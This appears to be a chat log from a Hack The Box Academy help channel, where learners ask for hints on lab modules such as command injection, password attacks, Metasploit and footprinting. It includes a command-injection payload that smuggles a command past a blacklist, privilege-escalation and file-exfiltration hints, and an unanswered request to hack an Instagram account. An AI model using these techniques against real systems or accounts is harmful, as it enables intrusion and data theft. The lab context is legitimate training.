#

do u know

#

how to hack into insta?

#

acc?

obtuse saddle
iron plaza
signal raft
#

needed some urgent helped

iron plaza
#

anyone finished the Metasploit Framework module? Need some clarifications with the EternalRomance related question ... I am unable to scan for ports is this a technical issue or am I missing something

final frigate
#

Hey, someone can help with the Predictable Reset Token in the Broken Authentication module? I think I have everything in order but it doesn't work

lethal atlas
iron plaza
# lethal atlas I am confused on which question you are referring to.

"Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer." I tried to nmap (using -sV and -Pn flag) the ip but keep getting "Host is up. All 1000 scanned ports on 10.129.172.143 are in ignored states."

leaden quail
#

Where can i find the footprinting list?

lethal atlas
leaden quail
#

si

#

thanks 😄

lethal atlas
#

search for ms17

#

dm me if you still cant get it

iron plaza
lethal atlas
#

anyone online that has completed password attacks?

hollow meteor
#

Where to discuss help on offshore pro labs

lethal atlas
# acoustic owl 🖐️

Im on the password reuse section and I am a bit confused on what I need to do. I can ssh using the credentials from the previous section, and I can see 2 other users. Do I need to use crackmapexec to brute one of those users? Or is teh answer in a readable file?

acoustic owl
random kettle
#

Command injection assessment have anyone got the ||base64 payload to work bash(<<<) blablabla also by encoding c”a”t to read the flag|| ?

visual mountain
visual mountain
#

yes

#

This is the response that i get

lethal atlas
wind plaza
#

hey, I am working on hacking wordpress final

#

but when I scan the site, it was reported not using wordpress

#

is it normal? I use wappalyzer and wpscan

vital adder
sleek copper
#

grab cubes

final frigate
#

can someone give me a hint on the Broken Authentication skills assesment? I access the ||support|| user and enumerate other, but can't get the admin panel

vital adder
wind plaza
#

thanks for helping

woven hollow
#

Can someone give me a second set of eyes? I'm doing the Live engagement under shells and payloads. I know host 1 is vulnerable to a certain payload but the msfvenom payload isn't working nor is the metasploit payload.

wheat coral
#

can someone help me out with the RDP brute force in the Password Attacks - Network Services?

fierce coral
shut owl
#

Could I get a sanity check for Whitelist Filters on File Upload Attacks?

keen wave
#

Hi,I am stuck on Attacking Common Services:Hard. Need your help in MSSQL Transact command. Can I dm someone?#got it Thx

violet axle
opaque badger
#

Has anyone here gotten the security+ cert? If so, how long would you recommend studying for it? Are there any modules on hackthebox that good to do before taking it?

woven hollow
opaque badger
#

thank you

dim yarrow
#

Can someone help me with the Footprinting module in the IMAP/POP3 section. I don’t no where I find the admin email my first idea was that the cto mail is the admin mail but it’s wrong

final frigate
#

@vital adder can I dm you?

vital adder
shadow orbit
#

Hello. I am stuck with Skill Assessment - Broken Authentication module. I have found a administrator user and also discovered encoding procedure for cookie. However I do not know how to proceed from here on. When I use the cookie with this admin user, I do not see any flag, in fact, the webpage seems the same as for the normal guest.

broken warren
#

Does anyone know any resources that would help with the Hardware challenges?

pine dagger
final frigate
#

Hey, there is any module that cover CSRF? I can't find one

lethal atlas
#

Session Security also touches on it a bit, actually a lot. lol

lethal atlas
pine dagger
#

And a little patience because Hydra is not the quickest.

plucky geyser
#

I'm struck in command injections module --bypassing other blacklisted characters

#

Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?

#

please help me guys

tight mesa
#

hello, anyone who has completed the skill assessment of command injection module?

grave dust
plucky geyser
#

hey @tight mesa can you help me with the 7th assignment - bypassing other blacklisted characters bro please

grave dust
#

i'm on the "Web Service & API Attacks" "Skill assessment". I found the flag but not with the SQLi. The python script works fine for "ExecuteCommand" but idk why when i try to "login" it doesn't give me any result. anyone ?

summer citrus
#

HELLO

finite gorge
#

Imma bit stuck at Enumeration with Nmap. I was able to find all of the tcp ports scanned but I got stuck in finding out where is the hostname of the target. I tried different methods in finding the hostname but haven't found it. Would appreciate the tips and help. It mentions how it is "case-sensitive"

rustic sage
#

Hej! Can someone really help me with the SNMP Footprinting module? 'am totally stuck at the last question where it asks me to "Enumerate the custom script that is running on the system". I can see only one service snmpd service running but dunno how to view the output. NotLikeThis

pine dagger
finite gorge
finite gorge
finite gorge
#

Ahh shoot I got the answer. Looks like I was too impatient to wait was all. Lol

fickle glen
#

Hello! Can someone tell me how can I avoid this? In the Password attacks - Network Services (RDP), I try to use hydra with the wordlists provided and I keep getting an error that basically hydra keeps trying a username with "" password and then stop because of too many connection errors, after brute forcing with some credentials in the wordlists but not all of them

woven hollow
river hornet
#

HI all, I've just signed up to the academy. I'm I guessing right, that if I have any questions about any of the modules etc, I post it in here?

river hornet
vagrant latch
#

Hello.
Anyone can help me in DM for the intro to packet network ananlysis module ?

ebon coral
#

Hi, @rain marlin Were you able to resolve this? I got stuck here as well

twin stirrup
#

Does anyone have a good command to only pull out the first names from dig output?

rustic sage
#

JavaScript Deobfuscation
Decoding:Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT".

#

i believe i have the correct answer but i dont know how it wants it formed

#

can anyone help?

rain marlin
rain marlin
ebon coral
#

Ok, I'll keep at it first. Not that burned yet.. haha!

rain marlin
#

Yeah got to the end of the mod and was working on the project and got stuck left it for awhile and came back, thought it'd be a good idea to start over and something must have changed in steps of the mod don't remember some of the stuff in it;

rain marlin
west canopy
#

@rustic sage DM me 🙂

vale geyser
#

anyone for webproxies skill assesment?

wheat coral
pine dagger
#

Follow the RDP example

ebon coral
ebon coral
#

I'm not sure if you did that step, but if you haven't that's what you should do

#

Have to allow inbound traffic in public profile

#

You can find the specific rule, but I didn't anymore. I just allowed any incoming traffic for the public profile

#

The step is not explict. I re-read the following section after the instruction to try to connect to the Share

rain marlin
ebon coral
#

Yes

rain marlin
opaque badger
#

I’m working through the nibbles Initial foothold problem in the getting started module. I’m running the curl commands as shown in the lesson but they take forever to run, if they don’t timeout first. Does anyone know why this is happening?

covert stag
#

Hi, i need some help with HTB academy SSTI Exploitation Example 1

west canopy
#

@covert stag DM me 🙂

dire sentinel
#

@opaque badger what are you trying to curl? Feel free to dm, worked through it a few days ago!

frank pulsar
#

hi! may I get some sanity check / nudge with Cross-Site Scripting (XSS) Skill Assessment pls?

covert stag
#

no jared already helpt me

#

was a little thing

#

i used exec

#

no spoiler

#

sorry u werent talking to me

#

im way 2 high man

#

lifeless completing htb academy modules

#

brain cpu is getting hot

#

sorry 4spam

uneven arch
#

how to start hacking , i know nothing i know the intermediate python thas all

mellow turtle
dire sentinel
#

Stuck on Footprinting - IMAP/POP3. Looking for email address, enumerated both services, checked both services under the user/pass provided, 0 emails in both

#

any help would be great!

frank pulsar
# pine dagger Ask the question 🙂

The whole module went very quickly and well but I'm stuck and the skill assessment part for the last 2 hours, literally. I tried numerous payloads in all fields (comment, name, email, website). I tried "escaping" the "html sandbox" of wordpress etc etc... I tried googling Wordpress comment xss.. but I'm just stuck . I guess I'd need some nudge in the right direction, I'm sure I'm missing something obvious at this point

dire sentinel
pine dagger
frank pulsar
pine dagger
#

Oh yeah, I had that happen a couple times. Just need to follow the OSCP mentality I guess.. Try Harder 😄

drifting knoll
pine dagger
#

Isn't that what Try Harder means?

drifting knoll
#

do you think running against a wall is smart?

mellow turtle
#

@drifting knoll If you are hulk yes

#

xD

pine dagger
#

I meant, Trying Harder, is also Trying Smarter. 😮

drifting knoll
#

then it should be called "Try Smarter", shouldn't it?

west canopy
#

"Thoroughly exhaust all options"

pine dagger
#

Well, if you want to criticise OS's motto, go right ahead. Not going to bother me.

mellow turtle
#

Both are ok

#

try harder trying smarter

polar widget
drifting knoll
#

i am not going to criticise anyone's motto, its about the way of interpretation but what i want to point is that you're actually aware of your own interpretations

polar widget
#

Imagine

pine dagger
#

The point that I was making was more that, things don't always work first time or quickly. Sometimes, trying multiple times does make it work. If it never works, then you find another method.

drifting knoll
#

agree, but trying the same thing multiple times and expecting different result is like running against a wall (if you know what i mean 😉 )
finding another method is what i meant by looking for the entry

polar widget
#

Yiss

#

nmap hard lab teaches that pretty quick

#

And several others ❤️

pine dagger
#

Oh, I agree. But always worth verifying whether it actually failed, or whether it was just a bit of network glitchiness.

drifting knoll
#

agree on that one too, you're not wrong - just want you guys to become better by taking things/information more precise

#

and think about what you see

polar widget
#

Learning process module has been updated and recently I read - there could be n number of things which could go wrong with a piece of technology, so the most obvious way could might be the most probable as well

drifting knoll
#

for example seeing tcp/80 open doesn't mean its a web server, it also can be some other service, right?

polar widget
#

Them be running ftp sometimes

pine dagger
#

No that can never happen! Its always a web server. Always!

#

:p

wispy condor
#

hello

pine dagger
#

hi

mellow turtle
#

hi

drifting knoll
polar widget
#

I really wanna contribute back to the HTB academy
Last year Ben contacted me I guess, I was having some tonsils issue and he was getting married ❤️

#

So I couldn't hop on a call with him

#

But now that I'm doing the academy modules
I've the same spirit to contribute back

#

I'll actually blog about what it means to me, personally, as using HTB academy

#

I've used literally everything at this point, almost every named educational platform, I'm having active subs too

drifting knoll
#

appreciate that!
feel free to DM me when you finish reading the Learning Process updates, always happy to hear feedback

polar widget
#

But HTB academy I'll place it on the top,
Its like a religious place to me

pine dagger
#

I'm only about 55% through the modules 😦

drifting knoll
pine dagger
#

Its more trying to find time for it than anything else. I started about 2 months ago, and worked through all tier 0, tier 1 stuff. About 50% through tier 2 easy stuff, then onto tier 2 medium o/

#

Stupid work slows me down 😦

drifting knoll
#

maybe it slows you down a bit but it doesn't stop you, right?

pine dagger
#

it does when I spent 17 hours straight coding to fix a problem

grave dust
#

does anyone had problem installing droopescan ?

drifting knoll
#

this might help you to reduce the amount of time to fix a problem

pine dagger
#

it was more trying to work around a bug in a product by using the API commands available to me, which drastically limited what I could configure/achieve on the system. Fixed it though. And it worked and looks flawless now. Of course. it'll now suffer from "works on dev machine" issue.

#

btw, was there some issues with the VPN stability about 6-8 weeks back? I was getting a lot of timeouts between pwnbox and targets.

vapid isle
#

Hi guys, I am working on the DNS module of Footprinting. Like a lot of people on here I am stuck at "What is the FQDN of the host where the last octet ends with "x.x.x.203"?". I have gotten as far as identifying the transfer. any help would be appreciated.

west canopy
#

@vapid isle DM me 🙂

desert current
#

Hi I'm working on the metaploit framework and I'm stuck on sections and jobs. On the last question with the outdated sudo version. I already have a shell and I found the exploit (the on on github). But the exploit does not work. Am I doing something wrong?

pearl tree
#

Hey, regarding module 18 section 80 (Linux Fundamentals - Filter Contents)

For cURLing the inlanefreight website: what exactly is considered a unique path?
Is ".../file.php/news/" considered non-unique compared to "...file.php/contact/"?
And are also file extensions included for these unique paths?

ebon coral
#

I was challenged with that definition also. If ever, you can start with the most lax definition (and start to tighten). On reflection, I think the Occam's razor concept would have helped me here 😅

tender meadow
#

neather pwnbox nor my personal vm seem to be able to install apache. am i just thick as mince?

#

no matter what i try it keeps comming up conection refused error 405 method not alloud

dull furnace
#

Hello, I hope I'm not being thick headed but I'm working on Getting Started: Privilege escalation and I'm stuck on question 2 on how to escalate privileges for user 2 to root. I would appreciate it if someone could give me a hint or point me in the right direction. I'm trying to use CHMOD command on the flag.txt file but am stuck on getting arround the password

west canopy
#

@dull furnace try looking for ||an ssh key in the root directory :)||

dull furnace
#

So i dont see an ssh key listed here only the flag file

#

unless i need to create one?

west canopy
#

i think its a hidden folder

#

/root/.ssh

pearl tree
dull furnace
#

you are right it was hidden thank you

normal laurel
#

Could someone help me with File Inclusion - Basic Bypassess?
I've been trying some stuff but it isn't working at all 😭

west canopy
#

@normal laurel make sure you are using the right path ||/index.php?language=languages/||

normal laurel
#

I am using that path

#

;-;

west canopy
#

try using ||four dots and two slashes||

normal laurel
#

no luck

west canopy
#

DM me

normal laurel
#

kk

rain marlin
ebon coral
#

It's a good feeling. Haha!

rain marlin
#

Feels like finally cleaning your room, got that out of the way;

strong creek
#

Hi guys. New to the OSCP world. I'm having a heck of a time on the https://academy.hackthebox.com/module/77/section/859 knowledge check.
I managed to get a foot hold but cannot for the life of me figure out how to get the privilege escalation to get to root.txt flag.
Been trying to figure out linpeas but everything i find is referring to the .sh file and all I can find is the Peass-ng.

Not sure what I'm doing was hoping for a point in the right direction.

Very excited to be on this journey, would love to get my OSCP cert. Thank you!

west canopy
#

@strong creek try running ||sudo -l , there is a GTFObin we can abuse :)||

livid pier
#

anyone around complete windows priv esc?

mossy epoch
desert current
random kettle
#

Web attacks assessment, I keep on getting access denied when i try to change the pass. Any heads up? (token and uid are correct tho)

random kettle
vital adder
shadow orbit
#

Hi, I have problems with Bypassing Security Filters in Web Attack module. I tried every request method from PUT to POST, however I always get Malicious Request Denied!. You can DM me.

iron plaza
acoustic owl
#

I am in module Active Directory Enumeration & Attack in section ACL Enumeration

The text says that this command could take 1-2 minutes.

`Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\htb-student> cd c:\tools
PS C:\tools> Import-Module .\PowerView.ps1
PS C:\tools> $sid = Convert-NameToSid dpayne
PS C:\tools> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}`

But even after 10 minutes I don't get a result.

What am I doing wrong?

acoustic owl
#

After more than 20 minutes, the command has run through. Without result.

Is it possible that the SID is wrong?

tawdry sail
#

Hi. I'm having a hard time submitting the answer on the Javascript Deobfuscation module - decoding chapter. I made the post request and used base64 to convert the response and it came out: 7h15_15_a_s3cr37_m3554g3
But when I submit that I get incorrect answer message. Is it a known issue?

acoustic owl
fierce coral
tawdry sail
iron plaza
tawdry sail
carmine cape
#

Hello can someone help with a hint on the file inclusion skills assessment section.
I have found the ||admin panel|| and have found which log path that is the right one.. I think.. The ||nginx || one.
I have tried the put in the php get cmd from the poisoning section but without any luck
Feel free to reply here or dm 🙂

iron plaza
river hornet
#

Hi, all. I'm at my wits end with Find Files and Directories (Linux Fundamentals) part about using the find tool. No matter what I put it keeps coming up saying that permission is denied and that the htb-student is not in the sudoers file. I've tried about 10 different variations on all of it, most of it suggested from Google searches and Reddit pages, all with the same result. Can anyone tell me what I'm missing here

iron plaza
river hornet
#

No matter what I try, I always get "htb-student is not in the sudoers file. This incident will be reported" or a list of "permission denied" if I don't put the /dev/null in

river hornet
acoustic owl
river hornet
glacial blaze
#

Hello,
I am currently stuck at Broken Authentication - Bruteforcing Passwords, mainly because of a max tries security mechanism. It is a brute force exercise, so max tries is a pain here. Am i missing something to circumvent it ?

twin stirrup
#

Anyone know what wordlist I should use for the last question on Information Gathering - Web Edition - Virtual hosts: Find the specific vHost that starts with the letter "d" and submit the flag value as your answer (in the format HTB{DATA}). I have tried a handful and im not getting any that start with D

glacial blaze
summer lava
molten cove
#

Hi, is anyone free to help with the module Active Directory LDAP?

twin stirrup
final frigate
#

I think I got blocked to, so I use the last passwords left in the question instead of the machine

glacial blaze
rare sky
#

Hi guys sorry for disorder, I have the following problem with this box, can someone help me please

summer lava
bleak willow
#

Hi, im doing the bash module and i have a little problem (again), when i run the script of loop exercise it returns a message: "***WARNING : deprecated key derivation used." and suggests me to use another flag but idk if its the same decoding method and i need the same cuz it should give me the flag code to finish the section. what should i do?

wheat garden
bleak willow
#

ok, ty

#

its a aes-128cbc code but it has a process than encodes and decodes before

wheat garden
# bleak willow ok, ty

I think I actually used the bash script you create in the comparison operators in order to do the base64 encoding then I manually plugged the output from that into the script they provided in the loops section.

bleak willow
#

ah i understand, search an alternative method instead repair the code could be easier

wheat garden
#

well if you look at the example bash script they give you your supposed to create a for loop you already did the work for that in earlier sections. In the comparison operators sectiion you created a for loop that does base64 enconding

bleak willow
#

yes, so i should retrieve the code after the loop and search a way to use it in the function with another method, right?

wheat garden
#

Take the variable "9M" and base64 encode it 28 times using the script you created in the comparison operators section. Pipe the output into WC (word count) take that numnber plug it into the salt variable of the script they give you in the loop section.

bleak willow
#

ok ill try it

wheat garden
#

ya that script loops 40 times modify it a little make it loop 28 or 29 times

bleak willow
#

with a for i in {1..28} ?

grave dust
#

hi, currently on "attacking common application" "skill assessment 1" think i know the exploit but can't use it. can't find info about ||servlet||

bleak willow
#

got it!!

wheat garden
bleak willow
#

i know, its only a growing number

#

thank u ❤️ , i have read the statement wrong 😅

wheat garden
#

its just to create a loop that iterated 29 times

bleak willow
#

i didnt see the "count the characters part"

#

yes, is really easy when you read it well 🤡

#

again, thank u a lot

wheat garden
wheat garden
#

any one do footprinting module could use a nudge on the medium lab so far I have scanned open ports on NMAP, mounted the nfs share and found credentials for alex, used alex credentials on smb share and found the "sa" credentials and not sure what to do next.

dire sentinel
wheat garden
plush edge
#

Hello, one question

#

During MS fundamentals module, 1st section asks me to RDP using a provided command, do I have to use said command in the workspace or do I need to connect to the vpn and use it on my end to connect to the workspace's machine?

#

Sry if silly question, just a bit confusing

wheat garden
plush edge
#

I'm trying to use it from the box that spawns in the lesson, but it doesnt work

wheat garden
#

sometimes can be good to exit out close your current terminal open a new one or disconnect and reconnect to the vpn

#

or refresh the target i.p reset the machine

plush edge
#

xfreerdp with the correspondent parameters, /v, /u, /p, all parameters are also provided, so really is almost copy/paste

wheat garden
#

on windows fundementals what section title are you at? SO I can go into it have a better idea what your dealing with

plush edge
#

First one :/

#

Introduction to Windows

wheat garden
#

ill DM you

uncut mirage
#

Hi, I'm stuck in the Skills Assesment section of the Web Service & API Attacks module.
I've managed to both get root access and dump the database, but can't find any passwords.
Feel free to reply here or dm, thanks!

lethal atlas
#

did you fuzz for extensions?

west canopy
#

Hello friends

lethal atlas
#

hey Jared

#

I am hating this Password attacks module. It takes FOREVER to crack passwords.

#

Currently on Attacking active Directory, trying to find the username and password given 3 names.

west canopy
#

if you need a nudge let me know

lethal atlas
woeful oxide
#

Guys

west canopy
#

sup d00d

woeful oxide
#

When you have the silver annual plan you don't get cubes, right?

#

I have completed some modules and my cubes are on the same number, it seems that I'm not earning anything

west canopy
#

not sure dawg i have never been on a plan

grave dust
west canopy
#

@grave dust DM me 🙂

lethal atlas
lethal atlas
#

cracked all 3 in less than a minute using the right list

eager rivet
#

For command injections exercise 7 (Bypassing Other Blacklisted Characters) could someone point me in the right direction please for which environment variable to use? Tried using only LS_COLORS variable to no avail, although ping does output successfully which I'm guessing my LS_COLORS command is failing.

||127.0.0.1${LS_COLORS:10:1}${IFS}${LS_COLORS:14:1}${LS_COLORS:1:1}${IFS}${HOME:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}||

west canopy
#

@eager rivet i was able to solve it using ||only ${IFS} and ${PATH:0:1}||

eager rivet
#

Not sure how but thanks both, I'll keep trying 🙂

lethal atlas
#

${IFS} works for spaces ${PATH:0:1} is a /

#

I couldnt get any LS_COLORS to work

eager rivet
#

Whenever I put in text though the ping command output is blank, this is where I'm unsure how you've managed to insert text after the / and have ls in there

lethal atlas
#

DM me and we can discuss in detail

sly kelp
#

Using Web Proxies

Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'

can anyone tell me why it is incorrect

lethal atlas
sly kelp
#

No there is no space

lethal atlas
pure silo
#

Hey guys sorry to butt in on this convo but I'm trying to ping one of the newbie modules and I'm having 100% packet loss. I tried restarting the target box a few times but nothing seems to work.

lethal atlas
#

make sure you only have one tun interface

west canopy
#

if it's a docker target it might not be pingable

rich mulch
#

Hello guys, this is a dump question but I did not figure it out.
"Excepts from using meterpreter shell. How to download a file from Wimdows to Linux via command line?"

In windows, there is no python so that I cannot setup a simple http server

west canopy
#

you could transfer a netcat binary to the windows machine , then use that to transfer files off of it.

lethal atlas
#

ftp?

rich mulch
# lethal atlas ftp?

I did try scp, ftp but does not work because my Kali connect to target windows via openvpn

rich mulch
west canopy
#

ok so lets pretend we want to move root.txt from the windows machine to our attack box

#

i already have a shell. First i will transfer over a netcat binary

#

Now on my attack box i start a netcat listener, redirect standard output into the name of the file we want to receive (root.txt)

#

then run netcat from the windows machine like this

#

and then if we look back on our attack box we can see the incoming connecting , give it a few seconds to finish, then we can read the flag

rich mulch
#

@west canopy
Hehe thank you so much 🙈 is there any other way from netcat?

pure silo
west canopy
pure silo
#

ahh that's a pain in the ass because I have to identify services running on the server

west canopy
#

Getting Started module?

pure silo
#

Yeah

west canopy
#

i think we can just ||copy/paste the ip and port into our browser :)||

pure silo
#

that worked in my pwnbox thank you so much

west canopy
#

np 🙂

pure silo
#

Can i shoot you a DM as to not clutter the chat?

wheat garden
#

clear

modest token
#

Can I dm someone about getting a foothold on the Password Attacks Lab - Hard, I've been bruteforcing the ||rdp ||service for two days now, but so far everything has been unsuccessful 😕

tight mesa
#

hi everyone

#

anyone who had completed the File Upload module...!!!!

covert stag
#

so, i am curious

#

i am doing the "Server-Side Attacks - Skills Assessmen" and it says get the flag with server side attack without registering

#

what happens if i register?

vital adder
red obsidianBOT
#

There is no flag here. Get back to hacking!

opaque badger
#

I have been stuck on the nibbles web footprinting module for a while now. Every time I attempt it I can't seem to run any of the commands taught in the lesson because they always time out. Any ideas on what the issue may be would be greatly appreciated

opaque badger
#

It has come to my attention I had 7 vpns running thank you coming to my tedtalk

autumn urchin
#

hello

livid pier
cunning narwhal
#

yo uh, how do i set openvpn up when the GUI doesn't evenload

livid pier
#

the gui where?

cunning narwhal
#

before i even continue on, am I supposed to setup openVPN on the VM I'm using? sorry if the question sounds dumb since I'm newer to this stuff

livid pier
#

all good

#

if you are using a vm that isnt pwnbox then yes you will need openvpn

#

if you are on linux you shouldnt need a gui, just
sudo openvpn /path

cunning narwhal
#

doesn't work

livid pier
#

that path is the object that you downloaded from here

#

what is the error?

cunning narwhal
#

1 sec

#

Saying error opening configuration files

#

I haven't even setup ovpn on the VM yet, if that helps

livid pier
#

ok you are on a linux?

cunning narwhal
livid pier
#

and have you downloaded that file?

cunning narwhal
#

starting_point file? yes

livid pier
#

the .opvn?

cunning narwhal
#

dm

fossil crescent
#

@limpid wharf, or anyone else who might be able to help -- I'm stuck on the "What is the hosting provider for the inlanefreight.com domain?" question in OSINT module (everything else in module done). Am about to try and brute-force the provided "hint" thru Burp (even though I suspect while it's not "wrong", there's more to it than that), but that's how at wits-end I am... presuming you've completed it, any nudge would be greatly appreciated. Thank-you. Thanks for the help AeonArchon -- don't know how anyone is possibly supposed to put that together... I mean, MacGyver may be able to take a rubberband, a paperclip, and a gum wrapper and hack a satellite in space, but even that makes more sense than the solution to this one.

limpid wharf
quiet cape
#

hello

#

can someone help me on this question

#

Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer

#

on network enum wit nmap easy lab i couldnt figure out the os

#

keep saying no exact os match

#

tried -A -o

modest token
# vital adder did you use the mutated wordlist?

yup, i used hydra and the user name provided in the exercise and went through the entire mutated word list, it takes about 8 hours with 4 threads. I got nothing. Maybe I should try to use another tool to bruteforce rdp?

vital adder
vital adder
modest token
rustic sage
vital adder
vital adder
manic ermine
#

Any hints on how you solved this??

gilded pagoda
#

Uhm hi, I'm new can someone guide me?

acoustic owl
frank pulsar
#

Hey, Login Brute Forcing Skills Assessment, 2nd (very last) brute forcing won't crack. I know the username and I'm using the supplied (and hinted) passw list. What am I missing..?

rustic sage
#

Hi

night pier
#

Any hints on attacking common services easy? I found credentials and am able to upload files (php reverse shell) but not sure how to access/execute it.

random kettle
#

can someone explain to me why the gitlab user enum script works on the pwn box but not on the local machine? i get unexpected syntax but for some reason it works great on the pwn box

acoustic owl
night pier
random kettle
acoustic owl
random kettle
glacial blaze
#

Hi,
I am stuck on Broken Authentication - Predictable Reset Token, first question.
I can't figure how to reproduce show token for htbuser using the algo. I am using strtotime(2022-08-04 01:15:52pm) * 1000 to convert to epoch with milliseconds. Maybe this is where i am wrong.
Or maybe i am not supposed to reproduce the htbuser token ....

rustic sage
#

I can obviously guess the answer to

From your scans, what OS type is running on the target?

But maybe I am missing something with nmap -O
I turned on OS detection however this is my output

➜  hack-the-box sudo nmap -O 10.129.185.38
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-05 00:44 AEST
Nmap scan report for 10.129.185.38
Host is up (0.66s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=8/5%OT=21%CT=1%CU=43283%PV=Y%DS=2%DC=I%G=Y%TM=62EBDB8D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11
OS:NW7%O6=M54BST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.06 seconds
#

Nevermind, running with -A worked.

slow ruin
#

Need a nudge on Whitelist Filters - File Upload Attacks. So far, I altered the bash script to include other php type extensions and I get a ton of file upload successful (193) but do we need to enumerate all of these? Noticed that many of these when uploaded you get a 404 file not found when trying to execute a command over your webshell

vital adder
obtuse saddle
#

I'm on the Metasploit Framework module and when I run exploit to the target I get; Service start timed out, OK if running a command or non-service executable... [*] Exploit completed, but no session was created.pepehands catthink When I run nmap on the target it says Windows Server 2008 R2 but when I run the exploit it says Windows Server 2016....😱 NotLikeThis I did copy and paste the IP so... I couldn't have made a mistake with the target...?.ummmm PepeProtecc

placid quest
#

@obtuse saddle maybe use scripts

clear bough
#

need help in "Information Gathering - Web Edition" on the question "Find and submit the contents of the TXT record as the answer." in Active Subdomain Enumeration tab. i got a flag but it didn't work . can i DM anyone for help??

small pawn
#

in windows fundamentals ntfs vs share permissions what firewall settings we have to change in order to allow connection from smbclient

covert stag
#

is it optional to not register for "Server-Side Attacks - Skills Assessment"

#

like is it unnecessary to register or is it necessary not to register?

#

Does in influences the assessment

#

?

#

let me guess i need a specic aacc for ssti or something

#

sorry if i spoil

#

lets put some effort in it obito...

#

🤨

#

there are multiple accounts registered😩

#

nope wait my bf did soemthing wrong. im to stoned to program

#

hihihi

frank pulsar
#

can I get some nudges with Broken authentication Skill assessment? I know how to craft a cookie and I know of 2 users, and I know how to enumerate more. But I can't seem to find more. I know it's a prefix, I just cant seem to find the syntax for the suffix

peak galleon
#

@willow sequoia

grave dust
#

hey guys i finished the footprinting module except one question in the DNS part.
"What is the FQDN of the host where the last octet ends with "x.x.x.203" ?"
I found 2 zones but it's in neither of them and tried several wordlist with gobuster without success. anyone ?
EDIT : thx @acoustic owl for the help

cedar folio
frank pulsar
cedar folio
lethal atlas
#

I need a little nudge in the right direction on Password Attacks > Credential Hunting in Linux. I have tried CME on smb but it just says everything is correct. SSH I have yet to find a user/password combo.

frank pulsar
grave dust
covert stag
#

can i pls dm someone i need some guidance with SSTI Exploitation Example 1

#

no fuck

#

i mean Server-Side Attacks - Skills Assessment

lethal atlas
#

lol no fuck?

cedar folio
cedar folio
frank pulsar
soft sedge
covert stag
#

OMFG

#

f this

acoustic owl
soft sedge
acoustic owl
soft sedge
soft sedge
covert stag
#

back to Attacking Common Applications

soft sedge
covert stag
#

why do i alwats feel dumn when doing htb shizzle...

acoustic owl
acoustic owl
covert stag
#

haah true

#

u shall never know everything

#

i dont like that idea

#

im curious in nature

#

so i wanna know everything

#

2bad ur lifespawn is not long enough

#

until we can upload our consciousness in the cloud

#

post human transcendence

acoustic owl
# covert stag haah true

I ran a command for over 40 minutes today. Actually out of pure desperation, because I saw no other way.
In another window I tried other things, but did not work. Just before Lab expired, my command finally worked and I got what I was looking for....

covert stag
#

luckyyyy

lethal atlas
acoustic owl
#

It was in the Module Active Directory Enumeration & Attack

plush edge
#

Hello!
Im currently having torubles with a section.

I have to get a mount point but the command provided returns this

#

Windows Fundamentals, NFTS vs Share points btw

meager crag
#

Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?

#

i got past the first half of the question which is finding the format but to get the password from rockyou-50.txt i cannot seem to find

modest token
#

I need a little help with Password Attacks Lab - Hard, I got the password for the vhd file, mounted it on a Windows, but the two files in it are illegible as far as I can tell. I've tried using registryspy, reglookup, and just going through the strings. I can't find anything of value... Has anyone been able to complete this one? Could I get a hint?

summer lava
#

anyone did the
VULNERABILITY ASSESSMENT == Nessus Skills Assessment
What were the targets for the authenticated scan?

west canopy
#

@summer lava ||the answer is just a single IP address :)||

summer lava
west canopy
#

🙂

rustic sage
#

The starting point course is very intruiging

#

I cant stop

#

Embed failure

normal marsh
rustic sage
#

you still need help?

#

write me a dm

silent ivy
#

Is there an module that covers pinging?

rustic sage
#

dm me

native comet
#

@here Anyone can help me a little with Password attacks easy lab i tried all the user from the inlane website no luck so far even tried username anarchy i am using the passwd file available in the resource. any hints?

vale salmon
#

Is there a way to reset the potfile that hashcat writes to when it scans a hash file? I keep coming up exhausted when trying to crack the NTDS file in the Skills Assessment for Cracking Passwords with Hashcat, because I didn't use the flags at the beginning.

livid wing
#

Hi guys,

After finishing the module Network Enumeration with Nmap i understood:
=>Scaning hosts on a network
=>Scaning ports of a host
=>How Nmap options controls the sent messages to the target (deactivating ARP paquets, ICMP echo, Sending ACK ... )
=>When to use each option, for example sending ACK paquets to bypass firewalls.
=>Using port 53 as a source port, as it allows dns udp connection

